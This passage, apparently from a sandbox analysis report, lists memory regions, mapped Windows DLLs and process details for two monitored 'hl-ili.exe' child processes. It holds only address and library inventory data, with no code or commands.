(normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 18416 start_va = 0x74c60000 end_va = 0x74ca4fff monitored = 0 entry_point = 0x74c7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 18417 start_va = 0x75bf0000 end_va = 0x76feefff monitored = 0 entry_point = 0x75dab990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 18418 start_va = 0x74b20000 end_va = 0x74b56fff monitored = 0 entry_point = 0x74b23b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 18419 start_va = 0x75600000 end_va = 0x75af8fff monitored = 0 entry_point = 0x75807610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 18420 start_va = 0x77350000 end_va = 0x7735bfff monitored = 0 entry_point = 0x77353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 18421 start_va = 0x773b0000 end_va = 0x773f3fff monitored = 0 entry_point = 0x773b7410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 18422 start_va = 0x74fe0000 end_va = 0x74feefff monitored = 0 entry_point = 0x74fe2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 18423 start_va = 0x75280000 end_va = 0x752ddfff monitored = 0 entry_point = 0x75297470 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\SysWOW64\\FirewallAPI.dll" (normalized: "c:\\windows\\syswow64\\firewallapi.dll") Region: id = 18424 start_va = 0x77970000 end_va = 0x77982fff monitored = 0 entry_point = 0x77971d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 18425 start_va = 0x75b00000 end_va = 0x75beafff monitored = 0 entry_point = 0x75b3d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 18426 start_va = 0x6e3d0000 end_va = 0x6e461fff monitored = 0 entry_point = 0x6e3ddd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 18427 start_va = 0x77870000 end_va = 0x77901fff monitored = 0 entry_point = 0x778a8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 18428 start_va = 0x70230000 end_va = 0x70296fff monitored = 0 entry_point = 0x70245a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 18429 start_va = 0x6e110000 end_va = 0x6e12dfff monitored = 0 entry_point = 0x6e123080 region_type = mapped_file name = "oledlg.dll" filename = "\\Windows\\SysWOW64\\oledlg.dll" (normalized: "c:\\windows\\syswow64\\oledlg.dll") Region: id = 18430 start_va = 0x6e0f0000 end_va = 0x6e108fff monitored = 0 entry_point = 0x6e0ff090 region_type = mapped_file name = "olepro32.dll" filename = "\\Windows\\SysWOW64\\olepro32.dll" (normalized: "c:\\windows\\syswow64\\olepro32.dll") Region: id = 18431 start_va = 0x74360000 end_va = 0x7437afff monitored = 0 entry_point = 0x74369050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 18432 start_va = 0x731a0000 end_va = 0x731aafff monitored = 0 entry_point = 0x731a1d20 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 18433 start_va = 0x7e0000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 18434 start_va = 0x690000 end_va = 0x6b9fff monitored = 0 entry_point = 0x695680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 18435 start_va = 0x930000 end_va = 0xab7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 18436 start_va = 0x75450000 end_va = 0x7547afff monitored = 0 entry_point = 0x75455680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 134 os_tid = 0x13ac Thread: id = 136 os_tid = 0xedc Process: id = "16" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x64551000" os_pid = "0xa80" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18437 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18438 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18439 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18440 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18441 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18442 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18443 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18444 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18445 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "hl-ili.exe" filename = "\\Program Files (x86)\\Xmpxd9\\hl-ili.exe" (normalized: "c:\\program files (x86)\\xmpxd9\\hl-ili.exe") Region: id = 18446 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 18447 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18448 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18449 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 18450 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18451 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 18452 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 18453 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 18454 start_va = 0x6ff50000 end_va = 0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 18455 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18471 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 18472 start_va = 0x4a0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 18509 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18510 start_va = 0x74e60000 end_va = 0x74fddfff monitored = 0 entry_point = 0x74f11b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 18511 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18512 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 18513 start_va = 0x630000 end_va = 0x6edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18514 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 18515 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 18516 start_va = 0x6f0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 18517 start_va = 0x74cb0000 end_va = 0x74df6fff monitored = 0 entry_point = 0x74cc1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 18518 start_va = 0x75130000 end_va = 0x7527efff monitored = 0 entry_point = 0x751e6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 18519 start_va = 0x74780000 end_va = 0x74871fff monitored = 0 entry_point = 0x747b8070 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 18520 start_va = 0x76ff0000 end_va = 0x770adfff monitored = 0 entry_point = 0x77025630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 18521 start_va = 0x74880000 end_va = 0x74a3cfff monitored = 0 entry_point = 0x74962a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 18522 start_va = 0x74ff0000 end_va = 0x7509cfff monitored = 0 entry_point = 0x75004f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 18523 start_va = 0x746c0000 end_va = 0x746ddfff monitored = 0 entry_point = 0x746cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 18524 start_va = 0x746b0000 end_va = 0x746b9fff monitored = 0 entry_point = 0x746b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 18614 start_va = 0x6e560000 end_va = 0x6e63ffff monitored = 0 entry_point = 0x6e612d30 region_type = mapped_file name = "opengl32.dll" filename = "\\Windows\\SysWOW64\\opengl32.dll" (normalized: "c:\\windows\\syswow64\\opengl32.dll") Region: id = 18630 start_va = 0x750b0000 end_va = 0x7512afff monitored = 0 entry_point = 0x750ce970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 18631 start_va = 0x77360000 end_va = 0x773a3fff monitored = 0 entry_point = 0x77379d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 18632 start_va = 0x702b0000 end_va = 0x702d4fff monitored = 0 entry_point = 0x702cae10 region_type = mapped_file name = "glu32.dll" filename = "\\Windows\\SysWOW64\\glu32.dll" (normalized: "c:\\windows\\syswow64\\glu32.dll") Region: id = 18633 start_va = 0x6e470000 end_va = 0x6e55dfff monitored = 0 entry_point = 0x6e486bd0 region_type = mapped_file name = "ddraw.dll" filename = "\\Windows\\SysWOW64\\ddraw.dll" (normalized: "c:\\windows\\syswow64\\ddraw.dll") Region: id = 18634 start_va = 0x702a0000 end_va = 0x702a6fff monitored = 0 entry_point = 0x702a1fc0 region_type = mapped_file name = "dciman32.dll" filename = "\\Windows\\SysWOW64\\dciman32.dll" (normalized: "c:\\windows\\syswow64\\dciman32.dll") Region: id = 18650 start_va = 0x771d0000 end_va = 0x77227fff monitored = 0 entry_point = 0x772125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 18651 start_va = 0x77260000 end_va = 0x772ecfff monitored = 0 entry_point = 0x772a9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 18652 start_va = 0x74c60000 end_va = 0x74ca4fff monitored = 0 entry_point = 0x74c7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 18653 start_va = 0x75bf0000 end_va = 0x76feefff monitored = 0 entry_point = 0x75dab990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 18654 start_va = 0x74b20000 end_va = 0x74b56fff monitored = 0 entry_point = 0x74b23b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 18655 start_va = 0x75600000 end_va = 0x75af8fff monitored = 0 entry_point = 0x75807610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 18671 start_va = 0x77350000 end_va = 0x7735bfff monitored = 0 entry_point = 0x77353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 18672 start_va = 0x773b0000 end_va = 0x773f3fff monitored = 0 entry_point = 0x773b7410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 18673 start_va = 0x74fe0000 end_va = 0x74feefff monitored = 0 entry_point = 0x74fe2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 18674 start_va = 0x75280000 end_va = 0x752ddfff monitored = 0 entry_point = 0x75297470 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\SysWOW64\\FirewallAPI.dll" (normalized: "c:\\windows\\syswow64\\firewallapi.dll") Region: id = 18675 start_va = 0x77970000 end_va = 0x77982fff monitored = 0 entry_point = 0x77971d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 18676 start_va = 0x75b00000 end_va = 0x75beafff monitored = 0 entry_point = 0x75b3d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 18831 start_va = 0x77870000 end_va = 0x77901fff monitored = 0 entry_point = 0x778a8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 18832 start_va = 0x6e3d0000 end_va = 0x6e461fff monitored = 0 entry_point = 0x6e3ddd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Thread: id = 137 os_tid = 0x12d8 Thread: id = 141 os_tid = 0xc54 Process: id = "17" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x5e856000" os_pid = "0x26c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18456 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18457 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18458 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18459 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18460 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18461 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18462 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18463 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18464 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "hl-ili.exe" filename = "\\Program Files (x86)\\Xmpxd9\\hl-ili.exe" (normalized: "c:\\program files (x86)\\xmpxd9\\hl-ili.exe") Region: id = 18465 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 18466 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18467 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18468 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 18469 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18470 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 18488 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 18489 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 18490 start_va = 0x6ff50000 end_va = 0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 18491 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18492 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 18493 start_va = 0x530000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 18598 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18599 start_va = 0x74e60000 end_va = 0x74fddfff monitored = 0 entry_point = 0x74f11b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 18600 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18601 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 18602 start_va = 0x530000 end_va = 0x5edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18603 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 18604 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 18605 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 18606 start_va = 0x7c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 18607 start_va = 0x74cb0000 end_va = 0x74df6fff monitored = 0 entry_point = 0x74cc1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 18608 start_va = 0x75130000 end_va = 0x7527efff monitored = 0 entry_point = 0x751e6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 18609 start_va = 0x74780000 end_va = 0x74871fff monitored = 0 entry_point = 0x747b8070 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 18610 start_va = 0x76ff0000 end_va = 0x770adfff monitored = 0 entry_point = 0x77025630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 18611 start_va = 0x74880000 end_va = 0x74a3cfff monitored = 0 entry_point = 0x74962a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 18612 start_va = 0x74ff0000 end_va = 0x7509cfff monitored = 0 entry_point = 0x75004f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 18613 start_va = 0x746c0000 end_va = 0x746ddfff monitored = 0 entry_point = 0x746cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 18796 start_va = 0x6e560000 end_va = 0x6e63ffff monitored = 0 entry_point = 0x6e612d30 region_type = mapped_file name = "opengl32.dll" filename = "\\Windows\\SysWOW64\\opengl32.dll" (normalized: "c:\\windows\\syswow64\\opengl32.dll") Region: id = 18797 start_va = 0x750b0000 end_va = 0x7512afff monitored = 0 entry_point = 0x750ce970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 18798 start_va = 0x77360000 end_va = 0x773a3fff monitored = 0 entry_point = 0x77379d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 18799 start_va = 0x702b0000 end_va = 0x702d4fff monitored = 0 entry_point = 0x702cae10 region_type = mapped_file name = "glu32.dll" filename = "\\Windows\\SysWOW64\\glu32.dll" (normalized: "c:\\windows\\syswow64\\glu32.dll") Region: id = 18800 start_va = 0x6e470000 end_va = 0x6e55dfff monitored = 0 entry_point = 0x6e486bd0 region_type = mapped_file name = "ddraw.dll" filename = "\\Windows\\SysWOW64\\ddraw.dll" (normalized: "c:\\windows\\syswow64\\ddraw.dll") Region: id = 18801 start_va = 0x702a0000 end_va = 0x702a6fff monitored = 0 entry_point = 0x702a1fc0 region_type = mapped_file name = "dciman32.dll" filename = "\\Windows\\SysWOW64\\dciman32.dll" (normalized: "c:\\windows\\syswow64\\dciman32.dll") Region: id = 18802 start_va = 0x746b0000 end_va = 0x746b9fff monitored = 0 entry_point = 0x746b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 18803 start_va = 0x771d0000 end_va = 0x77227fff monitored = 0 entry_point = 0x772125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: 